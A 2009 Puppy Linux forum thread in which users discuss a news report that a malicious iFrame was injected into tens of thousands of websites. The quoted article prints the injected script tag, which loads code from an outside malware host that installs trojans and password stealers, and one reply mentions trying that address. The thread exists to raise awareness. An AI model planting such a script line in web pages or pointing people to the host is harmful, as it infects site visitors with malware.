Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Thu 18 Dec 2014, 00:14
All times are UTC - 4
 Forum index » Off-Topic Area » Security
ScanSafe raises alarm: thousands of compromised Web pages
Post_new_topic   Reply_to_topic View_previous_topic :: View_next_topic
Page 1 of 1 Posts_count  
Author Message
Flash
Official Dog Handler


Joined: 04 May 2005
Posts: 11180
Location: Arizona USA

PostPosted: Wed 09 Sep 2009, 00:11    Post_subject:  ScanSafe raises alarm: thousands of compromised Web pages  

http://blogs.techrepublic.com.com/security/?p=2213&tag=nl.e036

Quote:
ScanSafe’s Mary Landesman author of the ominous-sounding post somehow found a malicious iFrame embedded in upwards of 55, 000 Web sites. That didn’t mean much to me until I found out what an iFrame was. According to the Web Design Group an iFrame consists of:

“The IFRAME element defines an inline frame for the inclusion of external objects including other HTML documents. IFRAME provides similar functionality to OBJECT. One advantage of IFRAME is that it can act as a target for other links.”

The last sentence is the one to pay attention to. In this particular case, the iFrame includes of the following snippet of code:

“script src=http://a0v.org/x.js”

If I understand correctly, that simple phrase will redirect Web browsers to http://a0v.org/a.js without the user knowing it.

What happens then

The Web site a0v.org is where the heavy-duty malware is. Once the Web browser is talking to a0v.org, Landesman explains a slew of malicious code consisting of trojans, backdoors, password stealers, and possibly a downloader will try to install on the visiting computer. If the operating system is Windows-based and vulnerable, the malware will successfully install.

He goes on to say that Windows users are the only ones who have to worry, but I think that's wishful thinking. This exploit redirects browsers to a malware site, where anything is possible.
Back to top
View user's profile Send_private_message 
Aitch


Joined: 04 Apr 2007
Posts: 6825
Location: Chatham, Kent, UK

PostPosted: Wed 09 Sep 2009, 12:53    Post_subject:  

more news

http://securitylabs.websense.com/content/Blogs/3465.aspx

http://topbuzznews.info/script-src-http-a0v.orgx.js/

hosted by.....godaddy!!

Check the Registrant name/street!! FFS!!

If you're with them....move!

Aitch Smile
Back to top
View user's profile Send_private_message 
mikeb


Joined: 23 Nov 2006
Posts: 9002

PostPosted: Wed 09 Sep 2009, 22:04    Post_subject:  

Quote:
http://a0v.org/x.js

tried that address but said server not found.

My partener had on site to do with parent stuff and quite often it would send the cpu 100% and memory would fill up until total seizure...my guess was something in an advert.

mike
Back to top
View user's profile Send_private_message 
Display_posts:   Sort by:   
Page 1 of 1 Posts_count  
Post_new_topic   Reply_to_topic View_previous_topic :: View_next_topic
 Forum index » Off-Topic Area » Security
Jump to:  

Rules_post_cannot
Rules_reply_cannot
Rules_edit_cannot
Rules_delete_cannot
Rules_vote_cannot
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.0462s ][ Queries: 12 (0.0043s) ][ GZIP on ]